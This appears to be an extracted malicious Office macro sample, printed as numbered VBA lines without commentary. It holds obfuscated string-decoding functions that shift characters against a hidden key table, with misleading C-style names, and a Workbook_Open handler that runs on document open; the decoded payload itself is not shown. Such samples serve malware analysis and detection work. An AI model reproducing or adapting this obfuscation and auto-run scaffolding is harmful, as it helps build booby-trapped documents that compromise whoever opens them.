Extracted Malware Payload (Word Macro)

1. Function CcheckSignalHandler(pSymFunctionTableAccess64)
2. without = ""
3. explicit = 1
4. cpp explicit, without, pSymFunctionTableAccess64
5. CcheckSignalHandler = without
6. End Function
7.  
8. Function cpp(ByRef sig, ByRef errorOutput, cstdlib)
9. files = Len(cstdlib)
10. If sig <= files Then
11. errorOutput = errorOutput + It(bufferstatic(Right(Left(cstdlib, sig), 1)), 4)
12. sig = sig + 1
13. cpp sig, errorOutput, cstdlib
14. End If
15. End Function
16.  
17. Function It(uses, strchr)
18. If uses - strchr < 1 Then
19. It = Right(Left(PrintCallstack.CP_OEMCP, Len(PrintCallstack.CP_OEMCP) + uses - strchr), 1)
20. Else
21. It = Right(Left(PrintCallstack.CP_OEMCP, uses - strchr), 1)
22. End If
23. End Function
24.  
25. Function bufferstatic(user)
26. SVR4 = 1
27. percentDone = 1
28. handlers SVR4, percentDone, user
29. bufferstatic = percentDone
30. End Function
31.  
32. Function handlers(ByRef SVR4, ByRef percentDone, user)
33. modify = PrintCallstack.CP_OEMCP
34. files = Len(modify)
35. If SVR4 < files Then
36.     If user <> Right(Left(modify, SVR4), 1) Then
37.     SVR4 = SVR4 + 1
38.     handlers SVR4, percentDone, user
39.     Else
40.     percentDone = SVR4
41.     End If
42. End If
43. End Function
44.  
45.  
46.  
47. Public Sub mode()
48. PrintCallstack.helpful = CcheckSignalHandler(PrintCallstack.drov)
49. PrintCallstack.frame = PrintCallstack.helpful
50. End Sub
51.  
52. Private Sub Workbook_Open()
53. y = "you"
54. You1 (y)
55. End Sub
56.  
57. Public Sub You1(Signalmap_t)
58. PrintCallstack.errors = Signalmap_t
59. End Sub